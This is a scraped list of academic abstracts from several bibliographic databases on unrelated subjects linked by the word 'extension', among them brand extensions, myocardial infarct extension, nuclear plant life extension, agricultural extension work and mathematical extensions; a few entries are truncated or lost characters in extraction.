Exploring this matter using quantitative research methods, the study provides empirical evidence that companies that have invested heavily in marketing actions in the past and have built strong brand equity over time show flexibility in the mark-up during the cost decision-making process of hypothetical brand extensions. Variations in mark-up percentages are also observed when there is a difference in image and category fit of the extension to the original brand. However, companies characterized by greater brand equity exhibited greater flexibility in the mark-up percentages, even for low-fit extensions. 11. Absolutely minimal extensions of functions on metric spaces International Nuclear Information System (INIS) Milman, V A 1999-01-01 Extensions of a real-valued function from the boundary ∂X₀ of an open subset X₀ of a metric space (X, d) to X₀ are discussed. For the broad class of initial data coming under discussion (linearly bounded functions), locally Lipschitz extensions to X₀ that preserve localized moduli of continuity are constructed. In the set of these extensions an absolutely minimal extension is selected, which was considered before by Aronsson for Lipschitz initial functions in the case X₀ ⊂ ℝⁿ. An absolutely minimal extension can be regarded as an ∞-harmonic function, that is, a limit of p-harmonic functions as p→+∞. The proof of the existence of absolutely minimal extensions in a metric space with intrinsic metric is carried out by the Perron method.
To this end, ∞-subharmonic, ∞-superharmonic, and ∞-harmonic functions on a metric space are defined and their properties are established 12. Detection of myocardial infarct extension by CK-B radioimmunoassay International Nuclear Information System (INIS) Rothkopf, M.; Boerner, J.; Stone, M.J.; Smitherman, T.C.; Buja, L.M.; Parkey, R.W.; Willerson, J.T. 1979-01-01 Myocardial infarct extension after the acute event was defined as a second rise in the myocardial isoenzyme of serum creatine kinase (CK-B) after the initial return of CK-B to normal values. In 43 patients with acute myocardial infarct, CK-B was measured by radioimmunoassay every 12 hrs for 14 days. Nineteen patients had anterior transmural myocardial infarcts (AMI), 14 had inferior transmural myocardial infarcts (IMI), and 10 had subendocardial myocardial infarcts (SEMI). Infarct extension as detected by a second rise in serum CK-B occurred in six patients (32%) with AMI, two (14%) with IMI, and two (20%) with SEMI. Four patients with AMI also had clinically evident infarct extension. In the other six, the infarct extension was undetected clinically. The measurement of serum CK-B values with a quantitative and sensitive assay suggests that myocardial infarct extension occurs more commonly than clinically recognized, but the frequency of extension may be less than that reported in patients in whom precordial mapping and total serum CK values were measured to identify this phenomenon 13. The extension of collective agreements to non parties Directory of Open Access Journals (Sweden) Stella Vettori 2014-01-01 Full Text Available There is a theme of majoritarianism running through the Labour Relations Act 66 of 1995 (LRA. Part of this theme is legislation that provides for the extension of collective agreements reached at sectoral level to non -parties. After due consideration of arguments for and against the extension of collective agreements, the conclusion is reached that the extension of collective agreements can potentially, under certain circumstances, increase unemployment and consequently inhibit the growth of small and medium sized firms. In the light of this possibility and with due regard to the stated objectives of the LRA, it is suggested that the legislation that makes provision for the extension of collective agreements to non –parties in section 32(g of the LRA should be given a purposive interpretation. It is suggested that in giving effect to this provision the effects on the labour market of any proposed extension of a collective agreement must be considered, before extension by the Minister of Labour. 14. Designing and application of SAN extension interface based on CWDM Science.gov (United States) Qin, Leihua; Yu, Shengsheng; Zhou, Jingli 2005-11-01 As Fibre Channel (FC) becomes the protocol of choice within corporate data centers, enterprises are increasingly deploying SANs in their data central. In order to mitigate the risk of losing data and improve the availability of data, more and more enterprises are increasingly adopting storage extension technologies to replicate their business critical data to a secondary site. Transmitting this information over distance requires a carrier grade environment with zero data loss, scalable throughput, low jitter, high security and ability to travel long distance. 
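As background to the entry on absolutely minimal extensions above (Milman, item 11), the objects it mentions can be written out explicitly; the formulas below are the standard ones and are not quoted from that paper. For a boundary datum f on ∂X₀ that is Lipschitz with constant L, the largest and smallest L-Lipschitz extensions are the McShane-Whitney extensions
\[ \overline{u}(x) = \inf_{y \in \partial X_0}\big(f(y) + L\,d(x,y)\big), \qquad \underline{u}(x) = \sup_{y \in \partial X_0}\big(f(y) - L\,d(x,y)\big), \]
and an extension u is absolutely minimal in Aronsson's sense when Lip(u, V) = Lip(u, ∂V) for every open V compactly contained in X₀. In the smooth Euclidean setting this is formally the infinity-Laplace equation
\[ \Delta_\infty u \;=\; \sum_{i,j} u_{x_i}\, u_{x_j}\, u_{x_i x_j} \;=\; 0, \]
obtained as the limit of the p-Laplace equations as p → ∞, which is the sense in which the abstract calls such an extension an ∞-harmonic function.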
To address these business requirements, there are three basic architectures for storage extension: Storage over Internet Protocol, Storage over Synchronous Optical Network/Synchronous Digital Hierarchy (SONET/SDH) and Storage over Dense Wavelength Division Multiplexing (DWDM). Each approach varies in functionality, complexity, cost, scalability, security, availability, predictable behavior (bandwidth, jitter, latency) and multiple carrier limitations. Compared with these connectivity technologies, Coarse Wavelength Division Multiplexing (CWDM) is a simplified, low-cost and high-performance connectivity solution for enterprises to deploy their storage extension. In this paper, we design a storage extension connectivity over CWDM and test its electrical characteristics and the random read and write performance of a disk array through the CWDM connectivity; the test results show that the performance of the connectivity over CWDM is acceptable. Furthermore, we propose three kinds of network architecture for SAN extension based on the CWDM interface. Finally, the credit-based flow control mechanism of FC and the relationship between credits and extension distance are analyzed. 15. Muscle strategies for leg extensions on a "Reformer" apparatus. Science.gov (United States) Cantergi, Débora; Loss, Jefferson Fagundes; Jinha, Azim; Brodt, Guilherme Auler; Herzog, Walter 2015-04-01 Considering the kinematics of leg extensions performed on a Reformer apparatus, one would expect high activation of hip and knee extensor muscle groups. However, because of the bi-articular nature of some lower limb muscles, and the possibility to vary the direction of force application on the Reformer bar, muscles can theoretically be coordinated in a variety of ways and still achieve the desired outcome. Hence, the aim of this study was to determine the knee and hip moments during leg extensions performed on the Reformer apparatus and to estimate the forces in individual muscles crossing these joints using static optimization. Fifteen subjects performed leg extension exercises on the Reformer apparatus using an individually chosen resistance. Much to our surprise, we found that subjects performed the exercise using two conceptually different strategies: (i) the first group used simultaneous hip and knee extension moments, while (ii) the second group used simultaneous hip flexion and knee extension moments to perform the exercise. These different strategies were achieved by changing the direction of the resultant force applied by the subject's feet on the Reformer bar. While leg extensions on the Reformer apparatus have been thought to strengthen the hip and knee extensor muscles, our results demonstrate that patients can perform the exercise in a different and unexpected way. In order to control the hip and knee moments and achieve the desired outcome of the exercise, the direction of force application on the Reformer bar must be controlled carefully. Copyright © 2014 Elsevier Ltd. All rights reserved. 16. Consumer Evaluation of a Vertical Brand Extension in the Lodging Industry: Relationships among Brand Trust, Brand Loyalty, Brand Distance, and Brand Extension OpenAIRE Lim, Yu Mi 2013-01-01 Vertical brand extensions have been used as popular strategies in the lodging industry. Research on brand extension that is related to brand trust and brand loyalty has been useful in making brand extensions successful.
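The Reformer abstract above (item 15) estimates individual muscle forces from the net hip and knee moments by static optimization. The sketch below shows a generic version of that step; the moment arms, force bounds, target moments and the quadratic cost are illustrative assumptions only and are not taken from the study.

import numpy as np
from scipy.optimize import minimize

# Hypothetical moment arms (m) of three muscles about the hip and knee.
# Column 2 has a negative hip arm and a positive knee arm, i.e. it plays
# the role of a bi-articular hip flexor / knee extensor.
R = np.array([[0.05, -0.03, 0.00],   # hip row
              [0.00,  0.02, 0.04]])  # knee row
tau = np.array([40.0, 25.0])         # required hip and knee moments (N*m)

def cost(F):
    # One common static-optimization objective: sum of squared muscle forces.
    return float(np.sum(F ** 2))

res = minimize(
    cost,
    x0=np.zeros(3),
    method="SLSQP",
    bounds=[(0.0, 5000.0)] * 3,                         # muscles can only pull
    constraints=[{"type": "eq", "fun": lambda F: R @ F - tau}],
)
print(res.x)  # estimated individual muscle forces (N)

Changing the required moment vector (for example hip extension versus hip flexion) changes which muscles the optimizer recruits, which is the mechanism behind the two strategies reported in the abstract.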
However, previous research focused on aggregated relationships among brand trust, brand loyalty, and brand extension. In addition, it has been found that quality and price distance from a core brand of the brand extension has an impact on the success of the brand extension. ... 17. Transforming the Roles of a Public Extension Agency to Strengthen Innovation: Lessons from the National Agricultural Extension Project in Bangladesh NARCIS (Netherlands) Chowdhury, A.H.; Odame, H.H.; Leeuwis, C. 2014-01-01 Purpose: The rapidly evolving nature of agricultural innovation processes in low-income countries requires agricultural extension agencies to transform the classical roles that previously supported linear information dissemination and adoption of innovation. In Bangladesh, strengthening agricultural 18. Type I Gaucher disease: extraosseous extension of skeletal disease International Nuclear Information System (INIS) Poll, L.W.; Koch, J.A.; Moedder, U.; Dahl, S. vom; Haeussinger, D.; Sarbia, M.; Niederau, C. 2000-01-01 Objective. To investigate the frequency and morphology of extraosseous extension in patients with Gaucher disease type I.Design and patients. MRI examinations of the lower extremities were analyzed in 70 patients with Gaucher disease type I. Additionally, the thoracic spine and the midface were investigated on MRI in two patients.Results. Four cases are presented in which patients with Gaucher disease type I and severe skeletal involvement developed destruction or protrusion of the cortex with extraosseous extension into soft tissues. In one patient, Gaucher cell deposits destroyed the cortex of the mandible and extended into the masseter muscle. In the second patient, multiple paravertebral masses with localized destruction of the cortex were apparent in the thoracic spine. In the third and fourth patient, cortical destruction with extraosseous tissue extending into soft tissues was seen in the lower limbs.Conclusions. Extraosseous extension is a rare manifestation of Gaucher bone disease. While an increased risk of cancer, especially hematopoietic in origin, is known in patients with Gaucher disease, these extraosseous benign manifestations that may mimic malignant processes should be considered in the differential diagnosis of extraosseous extension into soft tissues. A narrow neck of tissue was apparent in all cases connecting bone and extraosseous extensions. (orig.) 19. Melatonin and cortisol rhythm in patients with extensive nasal polyposis. Science.gov (United States) Fidan, Vural; Alp, Hamit Hakan; Kalkandelen, Sadettin; Cingi, Cemal 2013-01-01 Extensive nasal polyposis is an inflammatory disease which effects 1%-4% of normal population. The mechanism of its formation and the circadian rhythm of cortisol and melatonin in ENP have not investigated. Salivary levels of melatonin and cortisol were measured by radioimmunoassay in 31 patients with extensive nasal polyposis and in 27 control subjects matched for age and gender. In both groups none of the subjects did not have obstructive sleep apnea. The baseline and the peak levels of salivary melatonin in the extensive nasal polyposis group were significantly lower than in the control group (pmelatonin between the study and control groups (p>0.05). The highest values of melatonin were recorded at 04:00 h in both the study and control groups. 
The amplitude and the 24 h mean levels of salivary cortisol in the extensive nasal polyposis group were significantly lower than in the control group (pmelatonin and cortisol were found to be disrupted in patients with extensive nasal polyposis. These results may be applicable as therapeutic tools in the future and melatonin drugs might be useful in the therapy of nasal polyposis like cortisol drugs. Crown Copyright © 2013. Published by Elsevier Inc. All rights reserved. 20. Nuclear power plants life extension and decommissioning its economic aspects International Nuclear Information System (INIS) Watanabe, Yoshiaki 1994-06-01 In USA where the development of nuclear power was started early, the life of nuclear power plants expires successively around the turn of century, and the serious hindrance to electric power supply is feared. Therefore, the research for extending 40 year approved period of operation is in progress. By the extension of life of nuclear power plants, huge cost reduction is estimated as compared with the construction of new plants. However, due to the rise of the cost for the life extension, there were the cases of forced decommissioning. In this book, the present state of the life extension of nuclear power stations, the economical assessment and analysis of the life extension by DOE, the economical assessment by MIDAS method of Electric Power Research Institute, the economical assessment by cost-benefit method of Northern States Power Co., the assessment of the long term operation possibility of nuclear power stations, the economical assessment system for the life extension in Japan, the present state of the decommissioning of nuclear power stations and that in USA, Canada and Europe, the assessment of the decommissioning cost by OECD/NEA, and the decommissioning cost for thermal power stations are described. (K.I.) 1. Knowledge and perception of extension workers towards ict utilization in agricultural extension service delivery in Gazipur district of Bangladesh Directory of Open Access Journals (Sweden) F.A. Prodhan 2014-12-01 Full Text Available The primary purpose of the study was to assess the extent of knowledge and perception of extension workers towards ICT utilization and to determine the relationship between the selected characteristics of the respondents and knowledge and perception of extension workers towards ICT utilization in extension service delivery. The study was conducted in Gazipur district and comprised proportionate random sample of 90 extension workers from five upazila of Gazipur district. A pre-tested interview schedule was used to collect data from the respondents. To measure the knowledge on ICT utilization 35 statements were selected regarding 7 ICT with five possible answer of each tools and a score of one was given to the right answer and zero to the wrong answer alternatively to measure the perception of the respondents rated each of 10 statements ICT utilization in agriculture on a 5-point Likert type scale and the total of these ratings formed perception index. The result of the study showed that out of seven ICT tools the knowledge of extension workers was highest in case of MS Word this was followed by internet/ web service and the lowest knowledge was found in case of Geographical Information System. It is observed that an overwhelming majority (88.9% of agricultural extension workers in the study area had low to medium knowledge towards ICT utilization. 
Findings reveal that the respondents had top most perception on the ICT utilization in respect of ‘Extension work can be greatly enhanced by ICT’ followed by on ‘The benefits of ICT use outweigh the financial burden involved’. The result also indicated that more than fourth-fifth (84.4% of the respondents had medium to high perception towards ICT utilization. There were significant relationship between service experience and use of the information sources of the respondents with their knowledge towards ICT utilization conversely innovativeness, cosmopoliteness and job satisfaction of the 2. Extensions to the coupled chemical equilibria and migration code CHEQMATE International Nuclear Information System (INIS) Haworth, A.; Sharland, S.M.; Tasker, P.W.; Tweed, C.J. 1988-08-01 The CHEQMATE program was developed to model the evolution of spatially inhomogeneous aqueous chemical systems. The original CHEQMATE models one-dimensional diffusion and electromigration of ionic species with chemical equilibration provided by the geochemical program PHREEQE. CHEQMATE has principally been used to study the evolution of the chemical environment in and around a nuclear waste repository. In this paper, we describe extensions to CHEQMATE to increase the range of situations that can be modelled. These extensions are the addition of advection of species in a constant groundwater flow, the facility to model migration of species through a series of media with different transport properties and migration in a spherical geometry which allows investigation of dilution effects. For each extension, we describe the alterations in the transport part of the code and consider how the model is set up. An example of a problem using the different versions is given. (author) 3. Life extension of boilers using weld overlay protection Energy Technology Data Exchange (ETDEWEB) Lai, G.; Hulsizer, P. [Welding Services Inc., Norcross, GA (United States); Brooks, R. [Welding Services Inc., Welding Services Europe, Spijkenisse (Netherlands) 1998-12-31 The presentation describes the status of modern weld overlay technology for refurbishment, upgrading and life extension of boilers. The approaches to life extension of boilers include field overlay application, shop-fabricated panels for replacement of the worn, corroded waterwall and shop-fabricated overlay tubing for replacement of individual tubes in superheaters, generating banks and other areas. The characteristics of weld overlay products are briefly described. Also discussed are successful applications of various corrosion-resistant overlays for life extension of boiler tubes in waste-to-energy boilers, coal-fired boilers and chemical recovery boilers. Types of corrosion and selection of weld overlay alloys in these systems are also discussed. (orig.) 14 refs. 4. Computing Preferred Extensions for Argumentation Systems with Sets of Attacking DEFF Research Database (Denmark) Nielsen, Søren Holbech; Parsons, Simon 2006-01-01 The hitherto most abstract, and hence general, argumentation system, is the one described by Dung in a paper from 1995. This framework does not allow for joint attacks on arguments, but in a recent paper we adapted it to support such attacks, and proved that this adapted framework enjoyed the same...... formal properties as that of Dung. One problem posed by Dung's original framework, which was neglected for some time, is how to compute preferred extensions of the argumentation systems. 
However, in 2001, in a paper by Doutre and Mengin, a procedure was given for enumerating preferred extensions...... for these systems. In this paper we propose a method for enumerating preferred extensions of the potentially more complex systems, where joint attacks are allowed. The method is inspired by the one given by Doutre and Mengin.... 5. Routing protocol extension for resilient GMPLS multi-domain networks DEFF Research Database (Denmark) Manolova, Anna Vasileva; Ruepp, Sarah Renée; Romeral, Ricardo 2010-01-01 This paper evaluates the performance of multi-domain networks under the Generalized Multi-Protocol Label Switching control framework in case of a single inter-domain link failure. We propose and evaluate a routing protocol extension for the Border Gateway Protocol, which allows domains to obtain...... as survivability mechanism in case of single link failure, and employing proper failure notification mechanisms for routing of future connection requests under routing protocol re-convergence. Via simulations we illustrate the benefits of utilizing the proposed routing protocol extension for networks employing...... two Autonomous System disjoint paths and use them efficiently under failure conditions. Three main applications for the protocol extension are illustrated: reducing traffic loss on existing connections by xploiting pre-selected backup paths derived with our proposal, applying multi-domain restoration... 6. Life Extension of Aging High Level Waste (HLW) Tanks International Nuclear Information System (INIS) The Double Shell Tanks (DSTs) play a critical role in the Hanford High-Level Waste Treatment Complex, and therefore activities are underway to protect and better understand these tanks. The DST Life Extension Program is focused on both tank life extension and on evaluation of tank integrity. Tank life extension activities focus on understanding tank failure modes and have produced key chemistry and operations controls to minimize tank corrosion and extend useful tank life. Tank integrity program activities have developed and applied key technologies to evaluate the condition of the tank structure and predict useful tank life. Program results to date indicate that DST useful life can be extended well beyond the original design life and allow the existing tanks to fill a critical function within the Hanford High-Level Waste Treatment Complex. In addition the tank life may now be more reliably predicted, facilitating improved planning for the use and possible future replacement of these tanks 7. Cellular potts models multiscale extensions and biological applications CERN Document Server Scianna, Marco 2013-01-01 A flexible, cell-level, and lattice-based technique, the cellular Potts model accurately describes the phenomenological mechanisms involved in many biological processes. Cellular Potts Models: Multiscale Extensions and Biological Applications gives an interdisciplinary, accessible treatment of these models, from the original methodologies to the latest developments. The book first explains the biophysical bases, main merits, and limitations of the cellular Potts model. It then proposes several innovative extensions, focusing on ways to integrate and interface the basic cellular Potts model at the mesoscopic scale with approaches that accurately model microscopic dynamics. 
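The entry above on computing preferred extensions (item 4, Nielsen and Parsons) turns on enumerating the preferred extensions of an argumentation framework. The sketch below is a brute-force enumeration for an ordinary Dung framework with single-argument attacks; it is not the Doutre-Mengin procedure mentioned in the abstract and does not handle the joint attacks of the adapted framework, but it makes the semantics concrete.

from itertools import chain, combinations

def powerset(items):
    """All subsets of a collection, as frozensets."""
    s = list(items)
    return (frozenset(c) for c in
            chain.from_iterable(combinations(s, r) for r in range(len(s) + 1)))

def conflict_free(S, attacks):
    """No argument in S attacks another argument in S."""
    return not any((a, b) in attacks for a in S for b in S)

def defends(S, a, attacks, args):
    """Every attacker of a is itself attacked by some member of S."""
    return all(any((c, b) in attacks for c in S)
               for b in args if (b, a) in attacks)

def admissible(S, attacks, args):
    return conflict_free(S, attacks) and all(defends(S, a, attacks, args) for a in S)

def preferred_extensions(args, attacks):
    """Preferred extensions = maximal (by inclusion) admissible sets."""
    adm = [S for S in powerset(args) if admissible(S, attacks, args)]
    return [S for S in adm if not any(S < T for T in adm)]

# Example: a and b attack each other, b attacks c, d is unattacked.
args = {"a", "b", "c", "d"}
attacks = {("a", "b"), ("b", "a"), ("b", "c")}
print(preferred_extensions(args, attacks))

On this example the two preferred extensions are {a, c, d} and {b, d}; the enumeration is exponential in the number of arguments, which is exactly why dedicated procedures such as the one discussed in the abstract matter.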
These extensions are designed to create a nested and hybrid environment, where the evolution of a biological system is realistically driven by the constant interplay and flux of information between the different levels of description. Through several biological examples, the authors demonstrate a qualitative and quantitative agreement with t... 8. Generalized ensemble theory with non-extensive statistics Science.gov (United States) Shen, Ke-Ming; Zhang, Ben-Wei; Wang, En-Ke 2017-12-01 The non-extensive canonical ensemble theory is reconsidered with the method of Lagrange multipliers by maximizing Tsallis entropy, with the constraint that the normalized term of Tsallis' q-average of physical quantities, the sum ∑_j p_j^q, is independent of the probability p_i for Tsallis parameter q. The self-referential problem in the deduced probability and thermal quantities in non-extensive statistics is thus avoided, and thermodynamical relationships are obtained in a consistent and natural way. We also extend the study to the non-extensive grand canonical ensemble theory and obtain the q-deformed Bose-Einstein distribution as well as the q-deformed Fermi-Dirac distribution. The theory is further applied to the generalized Planck law to demonstrate the distinct behaviors of the various generalized q-distribution functions discussed in the literature. 9. On root class residuality of HNN-extensions International Nuclear Information System (INIS) Tieudjo, D. 2004-08-01 A sufficient condition for root-class residuality of HNN-extensions with root-class residual base group is proven; namely, if G = ⟨A, t; t⁻¹Ht = K, φ⟩ is the HNN-extension with base group A, stable letter t and associated subgroups H and K via the isomorphism φ, then G is root-class residual if group A is root-class residual and there exists a homomorphism σ of group G onto some group of a root-class such that σ is one-to-one on H. For the particular case when H = K and σ is the identical map, it is shown that G is root-class residual if and only if A is root-class residual and subgroup H of A is root-class separable. These results are generalized to multiple HNN-extensions. (author) 10. Analysis of integrated plant upgrading/life extension programs International Nuclear Information System (INIS) McCutchan, D.A.; Massie, H.W. Jr.; McFetridge, R.H. 1988-01-01 A present-worth generating cost model has been developed and used to evaluate the economic value of integrated plant upgrading/life extension projects in nuclear power plants. This paper shows that integrated plant upgrading programs can be developed in which a mix of near-term availability, power rating, and heat rate improvements can be obtained in combination with life extension. All significant benefits and costs are evaluated from the viewpoint of the utility, as measured in discounted revenue requirement differentials between alternative plans which are equivalent in system generating capacity. The near-term upgrading benefits are shown to enhance the benefit picture substantially. In some cases the net benefit is positive, even if the actual life extension proves to be less than expected. 11. AUTHENTIC MATERIALS IN EXTENSIVE READING CLASS AT STAIN PONOROGO Directory of Open Access Journals (Sweden) Dhinuk Puspita Kirana 2013-12-01 It is widely believed that English Foreign Language (EFL) learners need to develop their language proficiency by getting so much input.
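Two entries above rely on Tsallis non-extensive statistics (the nuclear modification factor analysis and the generalized ensemble theory, item 8). The expressions below record one commonly used set of conventions for orientation; they are standard forms from the non-extensive-statistics literature rather than formulas quoted from either paper. The Tsallis entropy and the escort (q-)average constraint mentioned in the abstract are
\[ S_q = k\,\frac{1 - \sum_i p_i^q}{q - 1}, \qquad \langle A \rangle_q = \frac{\sum_i p_i^q A_i}{\sum_j p_j^q}, \]
maximizing S_q under the usual constraints yields q-exponential distributions p_i ∝ [1 − (1 − q)βE_i]^{1/(1−q)}, and the q-deformed Bose-Einstein and Fermi-Dirac occupation numbers are often written
\[ n(E) = \frac{1}{\big[1 + (q-1)\beta(E-\mu)\big]^{1/(q-1)} \mp 1}, \]
with the upper sign for bosons and the lower for fermions; all of these reduce to the Boltzmann-Gibbs forms as q → 1. The nuclear modification factor analysed for RHIC and LHC data in the earlier entry is, in its usual definition,
\[ R_{AA}(p_T) = \frac{dN^{AA}/dp_T}{\langle N_{\mathrm{coll}} \rangle \, dN^{pp}/dp_T}. \]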
Moreover, students need to be familiarized with real English usage, where real forms of communication and cultural knowledge are crucially exposed. Teaching through authentic materials will make the learners feel that they are learning a real language which is used by real native speakers for real communication. Incorporating authentic materials helps students acquire an effective communicative competence in the language focus. The research intended to describe the implementation of authentic materials in an extensive reading class, the problems that arose and the students' responses toward the authentic materials in the extensive reading class. The research design was a descriptive qualitative method, and the research subjects were the lecturer of the Extensive Reading class and 33 students in class B of the fourth semester of STAIN Ponorogo who took the Extensive Reading subject. The instruments used were an observation sheet, an interview guideline and a questionnaire. The implementation of authentic materials in the extensive reading class covered procedures in three main phases, namely (1) Pre-Activity, (2) Main-Activity and (3) Post-Activity. The activities in the main activity are as follows: (a) pre-activity; (b) whilst-activity; and (c) the language focus stage. Problems arose during the implementation in terms of complicated planning, greater time allocation and some disinterested students. Finally, the students showed a significantly positive attitude toward the implementation of authentic materials in the extensive reading class. 12. Flexion/extension cervical spine views in blunt cervical Directory of Open Access Journals (Sweden) 2012-06-01 Full Text Available Objective: To examine the contribution of flexion and extension radiographs in the evaluation of ligamentous injury in awake adults with acute blunt cervical spine trauma, who show loss of cervical lordosis and neck pain. Methods: All patients who presented to our emergency department following blunt trauma were enrolled in this study, except those with SCIWORA, neurological deficits or fracture demonstrated on cross-table cervical spine X-rays, and those who were either obtunded or presented after cervical spine surgery. Adequacy of flexion and extension views was checked by the neurosurgery and radiology team members. All these patients underwent a cross-table cervical spine view followed by flexion/extension views based on the loss of lordosis on cross-table imaging and the presence of neck pain. Results: A total of 200 cases were reviewed, of whom 90 (45%) underwent repeat X-rays because of either inadequate exposure or limited motion. None of the patients with loss of lordosis on the cross-table view had flexion and extension views of the cervical spine positive for instability. Conclusions: Our results show that in patients who underwent acute radiographic evaluation of blunt cervical spine trauma, flexion and extension views of the cervical spine are unlikely to yield positive results in the presence of axial neck pain and/or loss of cervical lordosis. We can also hypothesize that performing flexion and extension views will be more useful once the acute neck pain has settled. Key words: X-rays; Cervical vertebrae; Lordosis 13.
The Attitudes of Agricultural Extension Workers towards the Use of E-Extension for Ensuring Sustainability in the Kingdom of Saudi Arabia Directory of Open Access Journals (Sweden) 2016-09-01 Full Text Available E-extension as a modern mode of communication can be used to improve the effectiveness and efficiency of extension services for agricultural sustainability. E-extension is the delivery of extension services using the Internet and the latest information communication technologies (ICTs, which allow networking, online sharing, and collaboration. Extension workers are a key factor in conducting an effective agricultural extension work plan; therefore, understanding extension workers’ attitudes towards the use of E-extension is important. It has been noted in some studies that, before implementing ICTs, positive attitudes from extension workers is required. This study analyzed the attitudes of extension workers towards the use of E-extension in the Kingdom of Saudi Arabia (KSA. A survey questionnaire was developed comprising statements regarding E-extension and then distributed through the post to all 230 extension workers in the Kingdom with the help of the Ministry of Agriculture. The findings show that extension workers generally had a positive attitude towards the use of E-extension. Significant relationships were found between the overall means of extension workers’ attitudes towards E-extension and their age, years of service, and computer experience. In the light of the results, recommendations drawn are as follows: encouraging extension workers, especially those who are older, to use the E-extension system through exclusive training programs and refresher courses; and incorporating combined workshops for extension workers with few and more years of service to eliminate the generation gap and instigating a better understanding of the E-extension system. 14. A Temporal Extension to Traditional Empirical Orthogonal Function Analysis DEFF Research Database (Denmark) Nielsen, Allan Aasbjerg; Hilger, Klaus Baggesen; Andersen, Ole Baltazar 2002-01-01 This paper describes the application of temporal maximum autocorrelation factor analysis to global monthly mean values of 1996-1997 sea surface temperature (SST) and sea surface height (SSH) data. This type of analysis can be considered as an extension of traditional empirical orthogonal function...... (EOF) analysis, which provides a non-temporal analysis of one variable over time. The temporal extension proves its strength in separating the signals at different periods in an analysis of relevant oceanographic properties related to one of the largest El Niño events ever recorded.... 15. Adaptive Learning in Extensive Form Games and Sequential Equilibrium DEFF Research Database (Denmark) Groes, Ebbe; Jacobsen, Hans Jørgen; Sloth, Birgitte 1999-01-01 This paper studies adaptive learning in extensive form games and provides conditions for convergence points of adaptive learning to be sequential equilibria. Precisely, we present a set of conditions on learning sequences such that an assessment is a sequential equilibrium if and only if there is......This paper studies adaptive learning in extensive form games and provides conditions for convergence points of adaptive learning to be sequential equilibria. Precisely, we present a set of conditions on learning sequences such that an assessment is a sequential equilibrium if and only... 16. 
Flow and breakup in extension of low-density polyethylene DEFF Research Database (Denmark) Rasmussen, Henrik; Fasano, Andrea 2018-01-01 The breakup during the extension of a low-density polyethylene Lupolen 1840D, as observed experimentally by Burghelea et al. (J Non-Newt Fluid Mech 166:1198–1209 2011), was investigated. This was observed during the extension of an circular cylinder with radius R0 = 4 mm and length L0 = 5mm...... the error bars as reported experimentally by Burghelea et al. (J Non-Newt Fluid Mech 166:1198–1209 2011). At low extensional rates, the measurements were considerably above the calculated ones. A very small relative suppression in the surface (0.1%) was required to achieve an agreement with all measurements... 17. Shelf-life extension of fresh chicken through radurisation International Nuclear Information System (INIS) Niemand, J.G.; Van der Linde, H.J. 1982-01-01 The article discusses the shelf-life extension of fresh chicken through radurization. In order to assess the potential of this process on the South African market, a detailed investigation was carried out to determine the shelf-life extension under local conditions. The following aspects were investigated; 1) reduction of bacterial numbers at different radurisation doses; 2) influence of storage temperature on shelf-life and 3) the elimination of Salmonella. Organoleptic testing was carried out on poultry radurised to doses of 3, 5, 7,5 and 10 kGy as well as on non-radurised controls 18. Abortion associated with Chlamydia abortus in extensively reared Iberian sows. Science.gov (United States) Salinas, J; Ortega, N; Borge, C; Rangel, M J; Carbonero, A; Perea, A; Caro, M R 2012-10-01 Reproductive disease was investigated in Iberian pigs on an extensive farrow-to-finish farm in the southwest of Spain. Chlamydia abortus was isolated in cell culture and C. abortus-specific PCR products were detected in placental and fetal tissues. In one batch of 14 sows, the percentage of sera positive for C. abortus specific antibodies increased from 35.7% to 85.7% in the period of 2 weeks following abortion. C. abortus may play a role in abortion in extensively reared Iberian sows. Copyright © 2012 Elsevier Ltd. All rights reserved. 19. Extensions of simple modules for the Witt algebra DEFF Research Database (Denmark) Rian, Khalid The irreducible representations of the Witt algebra $W$ are completely known. A classification of the irreducible $U_\\chi(W)$--modules was first established by Chang and later simplified by Strade. The aim of this article is to give a classification of the extensions of the simple $U_\\chi(W)$--mo......The irreducible representations of the Witt algebra $W$ are completely known. A classification of the irreducible $U_\\chi(W)$--modules was first established by Chang and later simplified by Strade. The aim of this article is to give a classification of the extensions of the simple $U... 20. Canonical extensions of the Johnson homomorphisms to the Torelli groupoid DEFF Research Database (Denmark) Bene, Alex; Kawazumi, Nariya; Penner, Robert 2009-01-01 We prove that every trivalent marked bordered fatgraph comes equipped with a canonical generalized Magnus expansion in the sense of Kawazumi. This Magnus expansion is used to give canonical extensions of the higher Johnson homomorphisms τm , for m 1 , to the Torelli groupoid, and we provide...... a recursive combinatorial formula for tensor representatives of these extensions. 
In particular, we give an explicit 1-cocycle in the dual fatgraph complex which extends τ2 and thus answer affirmatively a question of Morita and Penner. To illustrate our techniques for calculating higher Johnson homomorphisms... 1. OSPF-TE Extensions for Green Routing in Optical Networks DEFF Research Database (Denmark) Wang, Jiayuan; Ricciardi, S.; Fagertun, Anna Manolova 2012-01-01 This paper proposes extensions to the OSPF-TE protocol to enable green routing in GMPLS-controlled optical networks. Simulation results show a remarkable reduction in CO2 emissions by preferring network elements powered by green energy sources in the connection routing.......This paper proposes extensions to the OSPF-TE protocol to enable green routing in GMPLS-controlled optical networks. Simulation results show a remarkable reduction in CO2 emissions by preferring network elements powered by green energy sources in the connection routing.... 2. On extensions of wavelet systems to dual pairs of frames DEFF Research Database (Denmark) Christensen, Ole; Kim, Hong Oh; Kim, Rae Young 2015-01-01 It is an open problem whether any pair of Bessel sequences with wavelet structure can be extended to a pair of dual frames by adding a pair of singly generated wavelet systems. We consider the particular case where the given wavelet systems are generated by the multiscale setup with trigonometric...... masks and provide a positive answer under extra assumptions. We also identify a number of conditions that are necessary for the extension to dual (multi-) wavelet frames with any number of generators, and show that they imply that an extension with two pairs of wavelet systems is possible. Along the way... 3. Work on the extension of Restaurant No. 1 CERN Multimedia GS Department 2010-01-01 The work on the extension of Restaurant No. 1 will start on 12 April 2010. The section of the terrace currently available will be closed from this date onwards and the south terrace (see drawing) will gradually be made available in its place. Worksite for the extension of Restaurant No. 1. Closure of current terrace on 2 April. Opening of south terrace on 12 April. Opening of second area of terrace at the end of April. Opening of third area of terrace in May. 4. xSPDE: Extensible software for stochastic equations Directory of Open Access Journals (Sweden) Simon Kiesewetter 2016-01-01 Full Text Available We introduce an extensible software toolbox, xSPDE, for solving ordinary and partial stochastic differential equations. The toolbox makes extensive use of vector and parallel methods. Inputs are exceptionally simple, to reduce the learning curve, with default options for all of the many input parameters. The code calculates functional means, correlations and spectra, checks for errors in both time-step and sampling, and provides several choices of algorithm. Most aspects of the code, including the numerical algorithm, have a modular functional design to allow user modifications. 5. Semirigid Cantilever Extension System for Splinting Implants: A Clinical Report Directory of Open Access Journals (Sweden) Raissa Micaella Marcello Machado 2014-01-01 